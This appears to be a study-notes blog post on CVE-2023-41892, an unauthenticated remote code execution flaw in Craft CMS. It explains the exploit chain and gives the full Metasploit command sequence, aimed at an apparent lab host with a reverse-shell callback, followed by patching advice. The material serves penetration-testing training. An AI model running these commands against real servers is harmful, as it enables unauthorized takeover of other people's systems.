We covered the CVE-2023-41892 proof of concept that affected Craft CMS manually and with Metasploit framework. CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system.

Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

Cyber Security Study Notes

OSCP Study Notes

What is Craft CMS?

Craft CMS is a Content Management System that is easy and clear. It offers every mechanism needed to do the everyday chores needed for a functional website. Content integration is going to be hassle-free, no doubt.

The version of the Craft CMS is vulnerable to CVE-2023-41892 with this POC available publicly.

Like other content management systems, Craft CMS has a not very large pre-auth attack surface. However, the beforeAction method of the \craft\controllers\ConditionsController class could let an attacker to produce any object.

The vulnerability affects Craft CMS version 4.0.0-RC1 through 4.4.14.

Understanding The Exploit

  1. The getTmpUploadDirAndDocumentRoot() allows you to execute phpinfo  which reads the main web root in addition to the upload directory.
  2. The writePayloadToTempFile(documentRoot) function yieldsHTTP 502 HTTP error indicating successful exploit. We can write arbitrary PHP code to the site root as though it were an image by using the vulnerable Imagick extension.
  3. The trigerImagick(tmpDir) function performs a call to the Imagick extension to read our PHP file. The Imagick extension then reads our file and executes the PHP code.

Some people reported problems running the exploit so if this happened with you, you can then try this exploit or follow the Metasploit method outlined below.

Craft CMS Vulnerability Exploitation with Metasploit

sudo msfconsole

Then choose exploit/linux/http/craftcms_unauth_rce_cve_2023_41892

msf6 > use 1
msf6 > set rhosts surveillance.htb
msf6 > set rport 80
msf6 > set ssl false
msf6 > set lhost tun0
msf6 > set lport 443
msf6 > run

And it should be done and you can move on to post exploitation and privilege escalation phase.

Mitigation and Patching

The vulnerability can be fixed by upgrading to Craft CMS version 4.4.15 or higher.

Users can take the subsequent steps to lessen and mitigate the vulnerability y following below method:

Should your security key have been hacked, update it. Running the php craft setup/security-key command and transferring the modified CRAFT_SECURITY_KEY environment variable to all production environments will accomplish that.

Craft CMS CVE-2023-41892

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles